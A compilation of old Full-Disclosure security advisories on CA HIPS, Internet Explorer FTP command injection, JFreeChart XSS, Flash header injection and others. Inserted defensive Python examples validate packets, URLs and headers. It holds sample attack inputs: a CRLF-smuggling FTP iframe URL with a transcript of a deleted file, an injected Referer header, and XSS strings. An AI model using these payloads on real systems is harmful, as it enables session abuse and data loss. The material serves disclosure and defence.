[Full-disclosure] [IVIZ-09-005] CA HIPS Remote Kernel Vulnerability

2009-08-19 Thread iViZ Security Advisory
---
 

[ iViZ Security Advisory 09-005          19/08/2009 ]
---
 

iViZ Techno Solutions Pvt. Ltd.  
http://www.ivizsecurity.com
--
 

 
   * Title: CA HIPS kmxids.sys Remote Kernel Vulnerability
   * Software:  CA HIPS r8.1
 
--[ Synopsis:
 
   CA HIPS is a Host Based Intrusion Prevention System in which managed agents
   are deployed on individual hosts to be protected by the HIPS and controlled
   by the centralized console.
 
   It is possible to trigger faults in the kernel driver (kmxids.sys) used by
   the protection agent by sending certain malformed IP packets.
 
--[ Affected Software:
 
   * CA HIPS r8.1 (possibly older versions too)
 
 Tested on:

   * Agent Product Version: 1.5.290
   * Agent Engine  Version: 1.5.286
 
--[ Technical description:
 
   When the CA HIPS agent processes certain malformed IP packets, it fails to
   handle a boundary condition during parsing and pattern matching of the
   packet. It is possible to force the kernel driver (kmxids.sys) responsible
   for analyzing each inbound/outbound packet to reference invalid/unmapped
   memory.
 
   The following information is obtained during crash analysis:
 
   --
   CURRENT_IRQL:  2
 
   FAULTING_IP:
   kmxids+a2f4
   f6b8c2f4 8a26            mov ah,byte ptr [esi]
 
   DEFAULT_BUCKET_ID:  DRIVER_FAULT
 
   BUGCHECK_STR:  0xD1
 
   TRAP_FRAME:  f88ca4f4 -- (.trap 0xf88ca4f4)
   ErrCode = 
   eax=f88ca754 ebx=81f7415a ecx=0003 edx=428c200c esi=6e96d603 edi=f6b83264
   eip=f6b8c2f4 esp=f88ca568 ebp=f88ca574 iopl=0 nv up ei pl nz na pe nc
   cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=   efl=00010206
   kmxids+0xa2f4:
   f6b8c2f4 8a26            mov ah,byte ptr [esi]
   ds:0023:6e96d603=??
   Resetting default scope
 
   LAST_CONTROL_TRANSFER:  from 804f7b9d to 80527bdc
 
   STACK_TEXT:
   f88ca0a8 804f7b9d 0003 f88ca404  nt!RtlpBreakWithStatusInstruction
   f88ca0f4 804f878a 0003 6e96d603 f6b8c2f4 nt!KiBugCheckDebugBreak+0x19
   f88ca4d4 80540683 000a 6e96d603 0002 nt!KeBugCheck2+0x574
   f88ca4d4 f6b8c2f4 000a 6e96d603 0002 nt!KiTrap0E+0x233
   WARNING: Stack unwind information not available. Following frames may be wrong.
   f88ca574 f6b832e1 6e96d603 f6b83264 0003 kmxids+0xa2f4
                                           kmxids+0x12e1
   --
 
   The issue can be used to create a Denial of Service condition on each of the
   hosts protected by affected versions of the CA HIPS agent; however, due to
   the nature of the vulnerability, remote code execution is unlikely.
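   The boundary handling the description refers to is easiest to see in code.
   The following is an added example, not iViZ's or CA's code and not a model
   of kmxids.sys internals: a Python parser that validates the IPv4 length
   fields an attacker controls before it slices the payload, and a signature
   scan whose comparison window cannot run past the end of the captured
   buffer. The signature list and the four packets are constructed for the
   demonstration.

```python
"""Bounds-checked IPv4 parsing and payload pattern matching.

Added example, not iViZ's or CA's code. Every length that drives a memory
access here (IHL, Total Length, pattern window) is validated against the
bytes actually captured before it is used, so a malformed packet is dropped
instead of dereferenced.
"""
import struct


class MalformedPacket(ValueError):
    """Raised instead of reading outside the captured buffer."""


def parse_ipv4(buf: bytes) -> dict:
    """Validate the attacker-controlled length fields, then slice the payload."""
    if len(buf) < 20:
        raise MalformedPacket("shorter than the minimum IPv4 header")
    version = buf[0] >> 4
    ihl = (buf[0] & 0x0F) * 4            # header length in bytes
    if version != 4:
        raise MalformedPacket("not IPv4 (version %d)" % version)
    if ihl < 20:
        raise MalformedPacket("IHL %d below minimum header size" % ihl)
    if ihl > len(buf):
        raise MalformedPacket("IHL %d exceeds captured %d bytes" % (ihl, len(buf)))
    total_len = struct.unpack("!H", buf[2:4])[0]
    if total_len < ihl:
        raise MalformedPacket("Total Length %d smaller than header %d" % (total_len, ihl))
    if total_len > len(buf):
        raise MalformedPacket("Total Length %d exceeds captured %d bytes" % (total_len, len(buf)))
    # Both slice bounds are now known to lie inside buf.
    return {"ihl": ihl, "total_len": total_len, "proto": buf[9],
            "payload": buf[ihl:total_len]}


def scan_payload(payload: bytes, signatures) -> list:
    """Names of the signatures present; the window never leaves payload."""
    hits = []
    for name, pattern in signatures:
        # i + len(pattern) <= len(payload) is exactly the check a pointer walk
        # in C needs too; without it the compare reads past the buffer.
        for i in range(len(payload) - len(pattern) + 1):
            if payload[i:i + len(pattern)] == pattern:
                hits.append(name)
                break
    return hits


def inspect_packet(buf: bytes, signatures) -> tuple:
    """('drop', reason) for malformed input, ('ok', hits) otherwise."""
    try:
        pkt = parse_ipv4(buf)
    except MalformedPacket as exc:
        return ("drop", str(exc))
    return ("ok", scan_payload(pkt["payload"], signatures))


# Constructed test data: one demo signature and packets built with chosen
# IHL / Total Length values (checksums left at zero).
SIGNATURES = [("demo-marker", b"MARK")]


def build_ipv4(ihl_words: int, total_len: int, payload: bytes) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl_words, 0, total_len, 0, 0,
                      64, 6, 0, b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02")
    return hdr + payload


GOOD = build_ipv4(5, 20 + 8, b"xxMARKxx")              # consistent lengths
IHL_TOO_SMALL = build_ipv4(2, 20 + 8, b"xxMARKxx")     # IHL claims an 8-byte header
LEN_PAST_BUFFER = build_ipv4(5, 20 + 64, b"xxMARKxx")  # Total Length beyond capture
TRUNCATED = GOOD[:12]                                  # cut off mid-header
```

   Each rejected case is one the parser would otherwise have turned into a
   read beyond the buffer: an IHL below the minimum, a header or Total Length
   longer than what was captured, or a capture shorter than the fixed header.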
 
--[ Impact:
 
   * Denial of Service
   * Remote Code Execution is unlikely  
 
--[ Vendor response:
 
   * Fixed in CA Host-Based Intrusion Prevention System 8.1 CF 1
 
   
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=214665
 
--[ CVE ID:
 
   CVE-2009-2740
 
--[ Credits:
 
   This vulnerability was discovered by iViZ Security Research Team
   http://www.ivizsecurity.com
 
   http://www.ivizsecurity.com/security-advisory-iviz-sr-09005.html
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Rapid7 Advisory R7-0032: Microsoft Internet Explorer FTP Command Injection Vulnerability

2008-03-11 Thread advisory
___
Rapid7 Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___

Rapid7 Advisory R7-0032
Microsoft Internet Explorer FTP Command Injection Vulnerability

   Discovered: June 16th, 2007
   Published:  March 10, 2008
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0032

1. Affected system(s):

 KNOWN VULNERABLE:
  o Internet Explorer 6 (all versions)
  o Internet Explorer 5 (all versions)

 NOT VULNERABLE:
  o Internet Explorer 7

2. Summary

   Internet Explorer 5 and 6 are vulnerable to a File Transfer Protocol (FTP)
   CSRF-like command injection attack, whereby an attacker could execute
   arbitrary commands on an unsuspecting user's authenticated or unauthenticated
   FTP session. An attacker could delete, rename, move, and possibly steal data
   and upload malicious files to an FTP server under the attacker's control, on
   behalf of the user.

3. Vendor status and information

   Microsoft Corporation
   http://www.microsoft.com/

   Microsoft was notified of this vulnerability on January 22, 2008.  They
   acknowledged the vulnerability on February 7, 2008 and were given 30 days
   to provide fix information.

4. Solution

   The vendor plans to release a patch for this issue in an upcoming security
   bulletin.  If possible, upgrade to Internet Explorer 7.

5. Detailed analysis

   The error occurs when a user visits a page containing a malicious FTP URL.
   Internet Explorer 5 and 6 decode and do not properly sanitize the supplied
   URL. It is possible to force Internet Explorer to chain FTP commands
   together by inserting URL encoded CRLF pairs after each command in the URL
   supplied by an HTML element.
 
 <iframe src=ftp://[EMAIL PROTECTED]:port/%0D%0ADELE%20foo.txt%0D%0A/>
 
   Moreover, if two forward slashes are appended to the end of the malicious
   URL, Internet Explorer will attempt to use an already pre-authenticated
   connection established earlier by the user in the same browser session.
 
 
   If the user has a pre-authenticated connection to an FTP server, an
   attacker, knowing the username and endpoint of that pre-authenticated
   connection, could piggyback on the user's session to execute arbitrary
   commands.  A pre-authenticated connection is not necessary to carry out
   this attack, as Internet Explorer will attempt an anonymous login if no
   username is specified in the URL.  If only the username is specified and
   no trailing forward slashes are appended to the string, Internet Explorer
   will send the username with a blank password (which may be sufficient for
   more obscure anonymous user accounts).  If no username is specified,
   Internet Explorer will attempt to login using the 'IEUser@' user.
 
   Successful execution of some attacks may depend on the command tokenizing
   strategy used by the target FTP server and the security configuration on
   the FTP server (for instance, most FTP servers do not allow PORT requests
   for endpoints which do not have the same address as the requesting client).
 
   In testing, Internet Explorer 6 SP2 required the two trailing forward
   slashes for the exploit to work correctly.  Internet Explorer 6 SP1 did
   not have this restriction.  Internet Explorer 7 is not vulnerable to this
   issue, as it correctly sanitizes the URL before attempting to make the
   request on the FTP server.
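   Added example (not Rapid7's or Microsoft's code) contrasting the two client
   behaviours the analysis describes: one that percent-decodes the URL path and
   splices it straight onto the FTP control channel, so embedded CRLF pairs
   become separate commands, and one that refuses any decoded path containing
   CR, LF or another control character, which is the sanitizing step the
   advisory credits IE7 with. Host names and URLs are constructed values.

```python
"""Detecting CRLF injection in FTP URLs before a path reaches the control channel.

Added example, not Rapid7's or Microsoft's code. naive_commands() models the
flawed client; safe_ftp_path() is the check that prevents the injection.
"""
from urllib.parse import urlsplit, unquote


class UnsafeFtpUrl(ValueError):
    """Raised for a URL whose decoded form could not be sent as one FTP command."""


def naive_commands(url: str) -> list:
    """Control-channel lines a client emits if it trusts the decoded path.

    The client intends to send a single "CWD <path>" line terminated by CRLF;
    CRLF inside the decoded path splits that into several commands.
    """
    decoded = unquote(urlsplit(url).path)
    wire = "CWD " + decoded + "\r\n"
    return [line for line in wire.split("\r\n") if line]


def safe_ftp_path(url: str) -> str:
    """Return the decoded path only if it cannot escape a single FTP command."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "ftp":
        raise UnsafeFtpUrl("not an ftp URL")
    for label, raw in (("path", parts.path), ("userinfo", parts.username or "")):
        decoded = unquote(raw)
        # RFC 959 command lines end with CRLF; a control byte inside a path or
        # user name can only terminate or corrupt the command being built.
        bad = [c for c in decoded if ord(c) < 0x20 or c == "\x7f"]
        if bad:
            raise UnsafeFtpUrl("control characters in decoded %s: %r" % (label, bad))
    return unquote(parts.path)


def is_safe_ftp_url(url: str) -> bool:
    try:
        safe_ftp_path(url)
        return True
    except UnsafeFtpUrl:
        return False


# Constructed URLs: the injected form mirrors the advisory's pattern, the
# benign one is an ordinary file reference.
MALICIOUS = "ftp://user@ftp.example.invalid/%0D%0ADELE%20foo.txt%0D%0ACWD//"
BENIGN = "ftp://ftp.example.invalid/pub/file%20name.txt"
```

   Running naive_commands() on the injected URL shows the one intended CWD
   turning into three commands, which is what the server transcript below
   records; is_safe_ftp_url() rejects the same URL before anything is sent.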
 
   Demonstration of the exploit piggybacking on a pre-authenticated connection
   (malicious URL with two trailing forward slashes) with IE6 SP2:
 
   Malicious URI: ftp://[EMAIL PROTECTED]/%0D%0ADELE%20foo.txt%0D%0ACWD//
 
   -- Welcome banner
   220 debian FTP server (Version wu-2.6.2(2) Tue Mar 20 18:26:53 PST 2007) ready.
 
   -- IE6 Requests a user
   USER admin
 
   -- FTP server requires password
   331 Password required for admin.
 
   -- IE6 supplies password.
   PASS admin
 
   -- FTP Server responds with successful login.
   230 User admin logged in.
 
   -- IE6 tests 'OPTS UTF8' option.
   opts utf8 on
 
   -- Server responds with negative permanent reply to OPTS request.
   500 'OPTS utf8 on': command not understood.
 
   -- IE6 asks for the present working directory.
   PWD
 
   -- Server sends positive completion reply for PWD.
   257 /home/admin is current directory.
 
   -- IE6 requests malicious FTP URI from an iframe in HTML doc
   CWD /home/admin/
   DELE foo.txt
   CWD/
 
   -- Server responds with positive completion for CWD
   250 CWD command successful.
 
   -- IE6 sends a 'TYPE A' request
   TYPE A
 
   -- Server responds with positive completion for DELE
   250 DELE command successful.
 
   -- IE6 sends a NOOP.
   noop
 
   -- Server sends negative permanent response for last (invalid) command.
   500 'CWD

[Full-disclosure] R7-0031: JFreeChart Image Map Cross-Site Scripting Vulnerabilities

2007-12-06 Thread advisory
___
Rapid7 Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___

Rapid7 Advisory R7-0031
JFreeChart Image Map Cross-Site Scripting Vulnerabilities

   Published:  Dec 06, 2007
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0031.jsp

1. Affected system(s):

   KNOWN VULNERABLE:
     o JFreeChart 1.0.8

   KNOWN FIXED:
     o JFreeChart 1.0.8 branch jfreechart-1.0.8-security

2. Summary

   JFreeChart is a popular Java-based chart library used to generate
   charts and graphs of data.  The library includes support for
   generating HTML image maps, which allow for enhanced interaction of
   the chart via hyperlinks bound to shapes specified by coordinates.

   Multiple cross-site scripting vulnerabilities exist within the
   image map support functionality of JFreeChart which may allow an
   attacker to inject arbitrary HTML or JavaScript into any product
   or website which uses the library.

3. Vendor status and information

   JFreeChart Project
   http://sourceforge.net/projects/jfreechart/

   The JFreeChart project was notified of this vulnerability on
   November 28th, 2007 via their online bug tracking system.  The
   vulnerability was fixed on December 6th 2007 with a commit
   to their SVN repository.

4. Solution

   Upgrade to JFreeChart SVN repository revision 682
   using branch jfreechart-1.0.8-security.
 
   See http://jfreechart.svn.sourceforge.net/viewvc/jfreechart/
   for details.

5. Detailed analysis

   JFreeChart fails to properly escape the following properties of the
   generated image map:

  o The chart name.
  o The chart tool tip text.
  o The href attribute for a chart area.
  o The shape attribute for a chart area.
  o The coords attribute for a chart area.

   It is possible to inject custom HTML code into the code generated by
   the JFreeChart library.  If a web server uses this library to generate
   charts from user-supplied data, an attacker could cause other users of
   the same website or application to execute arbitrary JavaScript code
   when viewing a page containing a chart.
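   One way to generate the image map so that none of the listed properties can
   break out of its attribute, as an added example rather than JFreeChart's
   code: every free-text attribute (map name, tool tip, href) is entity-escaped,
   and shape and coords are checked against the vocabulary they are supposed
   to carry. The chart name, tool tip and coordinates are constructed inputs.

```python
"""Attribute escaping for generated HTML image maps.

Added example, not JFreeChart's code. Escaping covers the five properties
the advisory lists; shape and coords get an allow-list on top of that.
"""
import html
import re

COORDS_RE = re.compile(r"-?\d+(?:,-?\d+)*")
SHAPES = {"rect", "circle", "poly", "default"}


def attr(value) -> str:
    """Escape for a double-quoted attribute: ampersand, angle brackets and
    both quote characters become entities."""
    return html.escape(str(value), quote=True)


def coords_ok(coords: str) -> bool:
    """coords must be a comma-separated integer list and nothing else."""
    return COORDS_RE.fullmatch(coords) is not None


def area(shape: str, coords: str, href: str = "", title: str = "") -> str:
    """One <area> element. Fixed-vocabulary attributes are allow-listed, free
    text is escaped. Escaping alone would also be safe for shape and coords;
    the allow-list additionally rejects values that are meaningless there."""
    if shape not in SHAPES:
        raise ValueError("unsupported shape: %r" % shape)
    if not coords_ok(coords):
        raise ValueError("coords must be a comma-separated integer list")
    out = ['<area shape="%s" coords="%s"' % (shape, coords)]
    if href:
        out.append(' href="%s"' % attr(href))
    if title:
        out.append(' title="%s" alt="%s"' % (attr(title), attr(title)))
    out.append("/>")
    return "".join(out)


def image_map(name: str, areas) -> str:
    """The <map> wrapper; the chart name lands in two attributes, both escaped."""
    return '<map id="%s" name="%s">%s</map>' % (attr(name), attr(name), "".join(areas))


# Constructed hostile values of the kind a chart built from user data could carry.
EVIL_NAME = 'chart"><script>alert(1)</script>'
EVIL_TIP = "Q1 sales' onmouseover='alert(1)"


def demo_map() -> str:
    """Render a map from the hostile values; the output contains no live markup."""
    return image_map(EVIL_NAME, [area("rect", "0,0,10,10",
                                      href="/q1?x=1&y=2", title=EVIL_TIP)])
```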

6. Credit

   Discovered by Chad Loder of Rapid7.

7. Contact Information

   Rapid7, LLC
   Email: [EMAIL PROTECTED]
   Web: http://www.rapid7.com
   Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories. These advisories are a service
   to the professional security community. There are NO WARRANTIES with
   regard to this information. Any application or distribution of this
   information constitutes acceptance AS IS, at the user's own risk.
   This information is subject to change without notice.

   This advisory Copyright (C) 2007 Rapid7, LLC. Permission is hereby
   granted to redistribute this advisory, providing that no changes are
   made and that the copyright notices and disclaimers remain intact.



[Full-disclosure] (no subject)

2007-06-04 Thread Foresight Linux Essential Advisory Service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0024-1
Published: 2007-06-04
Rating: Moderate

Updated Versions:
    libexif=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/0.6.15-0.1-1
    group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3-0.1-6

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645
    https://issues.rpath.com/browse/RPL-1431

Description:
    Previous versions of the libexif package were vulnerable to an int
    overflow when loading EXIF data which could cause a crash (denial of
    service) or potentially allow the attacker to execute arbitrary code at
    the permission level of the user running a program which uses libexif.

- ---
Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License. A copy is
available at http://www.foresightlinux.org/permanent/mit-license.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (GNU/Linux)

iQIVAwUBRmRyJdfwEn07iAtZAQKE5w//f+RbLrHDhNXqIjz1LwPvNFpr3BfseRnU
DOZ4IZgLC5Bg7tOSVZtwRZRqDtPJqizNupQH5MZGWitW2PRZTf2j6pdCaLC5uJ93
OhALBccXxvU+TCgC19ocEDci1dCTk6oHJ0LjmSROsaWawnpTEdax0iLyYKA5NLaX
f4eocNnsmBYJ3psCDyC14bkmE2vyose2pAA0Itd4iw7S7psZBnn4oyN3iIXTzA8M
KQ9ZgY/YJ7qTUvakGVMbl0vninacuXGnPGSN05OTgP9X7yql5e/jaObaf1uEmgn2
kx0WayL+9CBTU1pT3H0TbD0rXpNHNQEctcSNzOJpWBWFFuFJi4hnByTD97jy4a4P
t0b271cjO5S+6h624od24kNxb4BggyHAn8t9U7ocGGuurD3ePUmJsTolbW4cZ/GZ
w6VVrAsLQg3zdLu49IZJi97WwvWFdjltOGKOU4xE47Wo/MgISo5vElb8GAAOVs6t
U0uoVoB75HNRbhrnVDNd1wM2qqCTQaWuvz3S04frz06dPGNCyEAABezrS9ij1D5m
KB4QZoNn1gn8B1wuvmTsV+7apUeiDXUDWHWe5XdAHnNwl0xYIX00oz3iT6xbenT2
ZK/ng88N1k639rs5iuJiYSBJL+8nD9FH6+cnUVeu63vlgvSGuuy3p+b67IhYVuf1
DCrJFbnLjVU=
=6scq
-----END PGP SIGNATURE-----



[Full-disclosure] CyTRAP Labs - Urs+Nahum's Security Checklist

2007-05-31 Thread CyTRAP Labs - advisory


Dear Colleague,

The latest version will always be here:

- Urs+Nahum's Security Checklist - pdf, 350 KB, for download -
  http://regustand.cytrap.eu/?p=1  (PS. it is complimentary and free for
  everybody, of course)

Urs+Nahum's Security Checklist was released May 30, 2007 but an UPDATED
version was released today, May 31, 2007, and is available for download at
the above link.

Cordially

Urs E. Gattiker
   CyTRAP Labs
   Roentgenstrasse 49
   8005 Zurich
   Switzerland
   +41 (0)44 272 - 1876
   +41 (0)76 200 - 7778 (mobile)
   email: Urs+Nahum-Checklist at CyTRAP.eu

At 13:00 2007-05-30, you wrote:
Message: 8
Date: Tue, 29 May 2007 14:53:17 -0700
From: blah [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] CyTRAP Labs - Urs+Nahum's Security
 Checklist
To: CyTRAP Labs - advisory [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Message-ID:
 [EMAIL PROTECTED]
Content-Type: text/plain; charset=iso-8859-1

I tried the link you listed, but it didn't work (no surprise there since
it's not released), but it looks like the document's available at:
http://www.cytrap.eu/files/ReguStand/2007/pdf/Urs%2BNahumChecklist-2007-05-29.pdf

so i guess it is released.  who wants to wait til tomorrow?



[Full-disclosure] CyTRAP Labs - Urs+Nahum's Security Checklist

2007-05-29 Thread CyTRAP Labs - advisory


Dear Colleagues,

I thought this might be of interest... regulators have done their best to
improve legislation to help organizations to better protect their
information systems.

Unfortunately, and as a result of this, organizations have been buried in an
avalanche of conflicting requirements that are difficult to keep track of.
They are expected to demonstrate an acceptable standard of due care in
managing their computing infrastructures and the information that networks
and systems create, transmit, and store. Moreover, they have to show that all
this helps reduce the risk of having their systems misused for criminal
activities.

Hence, we thought we would write Urs+Nahum's Security Checklist. It provides
well-structured information that enables high-level reporting, thus
empowering executive and technical leaders with a greater ability to make
informed decisions. It prioritizes the numerous requirements that managers
need, guiding them through the process that improves corporate risk
management and information security while helping improve confidentiality of
data and citizens' privacy.

You can get a short summary here:

- short summary about Urs+Nahum's Security Checklist - press release --
  http://info.cytrap.eu/?page_id=64

- an advance copy of Urs+Nahum's Security Checklist - pdf, 350 KB, for
  download - http://regustand.cytrap.eu/?p=1  (PS. it is complimentary and
  free for everybody, of course)

Urs+Nahum's Security Checklist will be released May 30, 2007.  We hope that
it will be useful to you all in your daily work. Please let us know what you
think about this work, if you can spare the time, of course.

Enjoy your long weekend.


Cordially

Urs E. Gattiker
   CyTRAP Labs
   Roentgenstrasse 49
   8005 Zurich
   Switzerland
   +41 (0)44 272 - 1876
   +41 (0)76 200 - 7778 (mobile)
   email: Urs+Nahum-Checklist at CyTRAP.eu 



[Full-disclosure] Tele2 - Versatel and Vivendi - exploit PATCHED

2006-12-21 Thread CyTRAP Labs - advisory
This vulnerability has been patched successfully by the vendor, as tests by
various parties have demonstrated; more details here:

http://cytrap.eu/blog/?p=133

Happy Holidays
Urs E. Gattiker
CyTRAP Labs and www.CASEScontact.org


At 21:23 2006-10-04, you wrote:
--

Message: 2
Date: Wed, 04 Oct 2006 13:56:27 +0200
Subject: [Full-disclosure] Tele2 - Versatel and Vivendi - exploit
To: full-disclosure@lists.grok.org.uk
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=us-ascii; format=flowed

Tele 2 has recently announced that it is selling its Benelux assets
to Versatel and yesterday it informed the media that it intends to do
the same with its French assets, selling those to Vivendi.

The company that touts itself as providing economical broadband and
telecommunication services does, however, have a slight problem
regarding information security.

A vulnerability is being taken advantage of by various groups of
people and, in turn, this could harm home users that receive their
broadband and fixed-line services from Tele2.

In fact, several security features can be de-activated allowing a
malicious user to take control of a user's PC, his broadband
connection as well as his phone line as described here with a screen shot:

http://cytrap.eu/blog/?p=57

This is another example where users face risks regarding their
internet connection that they might not even be aware of. Another one of
those is the recent Fon example also circulated on this list.

Urs E. Gattiker
CyTRAP Labs & CASEScontact.org



[Full-disclosure] Rapid7 Advisory R7-0026: HTTP Header Injection Vulnerabilities in the Flash Player Plugin

2006-10-17 Thread advisory
Rapid7 Advisory R7-0026
HTTP Header Injection Vulnerabilities in the Flash Player Plugin

  Published:   Oct 17, 2006
  Revision:    1.0
  http://www.rapid7.com/advisories/R7-0026.jsp

1. Affected System(s):

KNOWN VULNERABLE:
  o Flash Player plugin 9.0.16 (for Windows)
  o Flash Player plugin 7.0.63 (for Linux)

PROBABLY VULNERABLE:
  o Earlier 9.0.x and 7.0.x versions
  o 8.0.x versions

KNOWN FIXED:
  o Flash Player plugin BETA version 9.0.18d60 (for Windows)

2. Summary

Two HTTP Header Injection vulnerabilities have been discovered by Rapid7
in the Flash Player plugin. They allow attackers to perform arbitrary
HTTP requests while controlling most of the HTTP headers. This can make
it easier to perform CSRF attacks [2] in some cases. When the HTTP
server implements Keep-Alive connections and when Firefox is used, these
Flash vulnerabilities can even be used to perform totally arbitrary HTTP
requests where every part is controlled by the attacker: HTTP method,
URI, HTTP version, headers, and data. Such attacks make use of the HTTP
Request Splitting method.

3. Vendor Status and Information

Adobe Systems, Inc.
http://www.adobe.com

Sep 18, 2006
  Adobe acknowledges reception of the vulnerability details.

Sep 29, 2006
  Adobe responds with proposed dates for a fix later this year.

Oct 5, 2006
  Adobe releases a fixed BETA version of Flash 9 for Windows (version
  9.0.18d60, release files are named beta_100406).

Oct 17, 2006
  Advisory is published after expiration of the 30-day grace period
  granted to Adobe to fix and disclose the vulnerabilities.

4. Solution

Use the fixed BETA version (9.0.18d60). Alternatively, only allow trusted
websites to use Flash, disable or uninstall the Flash plugin, or use
alternative Flash plugins (GplFlash, Gnash).

5. Detailed Analysis

The vulnerabilities described hereafter have been successfully tested
with the latest versions of Flash available for various platforms as of
2006/09/06, and with multiple combinations of browser/OS:

o IE6 SP2 (aka IE6 SV1) for Windows, with Flash plugin 9.0.16
o Firefox 1.5.0.6 for Windows, with Flash plugin 9.0.16
o Firefox 1.5.0.6 for Linux, with Flash plugin 7.0.63

5.1. XML.addRequestHeader() Vulnerability

Flash features a scripting language called ActionScript. ActionScript
comes with a certain number of standard classes available to Flash
developers. In particular, the send() method of the XML object can be
used to send XML document trees to arbitrary URLs using, by default, a
POST request. This, in itself, is not a vulnerability; the XML.send()
method definitely complies with the Flash security model [4].

However another method defined in the XML class, addRequestHeader(), can
be used to add arbitrary HTTP headers to the request performed by Flash.
Its intended usage is:

  var req:XML = new XML('test');
  req.addRequestHeader("X-My-Header", "42");
  req.send("http://host/path");

When calling req.send("http://host/path"), such a POST request would be
submitted to 'host' (common HTTP headers that do not matter to us in
this example have been removed for brevity):

  POST /path HTTP/1.1
  Host: host
  Referer: (referer)
  Content-type: application/x-www-form-urlencoded
  X-My-Header: 42
  Content-Length: 4

  test

For security reasons, Flash 9 does not let developers use
addRequestHeader() to set headers such as Host, Referer, or
Content-Length.

But there is a way to get around this security restriction: the
addRequestHeader() method does not sufficiently sanity check its two
arguments. This makes it possible to inject arbitrary headers:

  req.addRequestHeader("Referer:http://anywhere\r\nX-foo", "bar");

With IE, a request containing only the fake Referer is sent:

  POST /path HTTP/1.1
  Host: host
  Referer: http://anywhere
  Content-Type: application/x-www-form-urlencoded
  X-foo: bar
  Content-Length: 4

  test

With Firefox, a request containing both the real Referer and the fake
one is sent:

  POST /path HTTP/1.1
  Host: host
  Referer: (real referer)
  Content-type: application/x-www-form-urlencoded
  Referer:http://anywhere
  X-foo: bar
  Content-Length: 4

  test

For this attack to work, the first argument of addRequestHeader() must
not contain any space (ASCII 0x20) else the Flash plugin appears to
ignore the addRequestHeader() call. This is absolutely not a problem in
real-world attack scenarios, because the space character usually present
before the Referer value is optional (see RFC 2616 [5], section 4.2
Message Headers).

It is interesting to note that IE seems to post-process the headers
generated by Flash before sending them to the HTTP server. Indeed, IE
diligently removes the real Referer to use the Flash-generated one, and
it even automatically adds the optional space character before the fake
Referer value.

Of course any cookie that would be associated with 'host' would be
automatically sent along with the request, which is another good thing
for attackers.
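Added example, not Adobe's or Rapid7's code, of the argument validation that
addRequestHeader() lacked according to the analysis above: the header name
must be a single RFC 2616 token, so a colon, CR or LF cannot be smuggled in
through it; the value may not contain CR or LF; and names the client reserves
for itself are refused regardless of case. The RESERVED set is an assumption
for the demo, not Flash's actual list.

```python
"""Validating caller-supplied HTTP request headers before serialising them.

Added example, not Adobe's or Rapid7's code. A header survives validation
only if it can be emitted as exactly one "Name: value" line.
"""
import re

# RFC 2616 token: one or more CHARs excluding CTLs and the separator set
# (which includes ':' and SP, so neither can appear in a name).
TOKEN_RE = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")

# Assumed for the demo: headers the client must own. Flash's real list is
# not reproduced here.
RESERVED = {"host", "referer", "content-length", "connection", "transfer-encoding"}


class BadHeader(ValueError):
    """Raised for a header that could not be emitted as a single header line."""


def validate_header(name: str, value: str) -> tuple:
    if not TOKEN_RE.fullmatch(name):
        raise BadHeader("header name is not a token: %r" % name)
    if name.lower() in RESERVED:
        raise BadHeader("header %r is reserved for the client" % name)
    if "\r" in value or "\n" in value:
        raise BadHeader("CR or LF in header value: %r" % value)
    return (name, value.strip())


def header_accepted(name: str, value: str) -> bool:
    try:
        validate_header(name, value)
        return True
    except BadHeader:
        return False


def serialise(headers) -> bytes:
    """Emit validated headers; each (name, value) pair yields exactly one line."""
    lines = ["%s: %s" % validate_header(n, v) for n, v in headers]
    return ("\r\n".join(lines) + "\r\n").encode("ascii")


# Constructed inputs mirroring the advisory's intended and injected calls.
INTENDED = ("X-My-Header", "42")
INJECTED_NAME = ("Referer:http://anywhere\r\nX-foo", "bar")
INJECTED_VALUE = ("X-foo", "bar\r\nX-bar: baz")
```

The token rule alone already defeats the injected name, since ':' and '/'
are not token characters; the CR/LF check on the value and the reserved-name
check close the two remaining routes to an extra or overwritten header line.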

For total control of the generated request, when the server supports

[Full-disclosure] Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux

2006-10-16 Thread advisory
___
 Rapid7, LLC Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___


Rapid7 Advisory R7-0025
Buffer Overflow in NVIDIA Binary Graphics Driver For Linux

   Published:  Oct 16, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0025.jsp

1. Affected system(s):

   KNOWN VULNERABLE:
o NVIDIA Driver For Linux v8774
o NVIDIA Driver For Linux v8762

   PROBABLY VULNERABLE:
o NVIDIA Driver for FreeBSD
o NVIDIA Driver for Solaris
o Earlier versions

   KNOWN FIXED:
o None

2. Summary

   The NVIDIA Binary Graphics Driver for Linux is vulnerable to a
   buffer overflow that allows an attacker to run arbitrary code as
   root. This bug can be exploited both locally or remotely (via
   a remote X client or an X client which visits a malicious web page).
   A working proof-of-concept root exploit is included with this
   advisory.

   The NVIDIA drivers for Solaris and FreeBSD are also likely to be
   vulnerable.

3. Vendor status and information

   NVIDIA Corporation
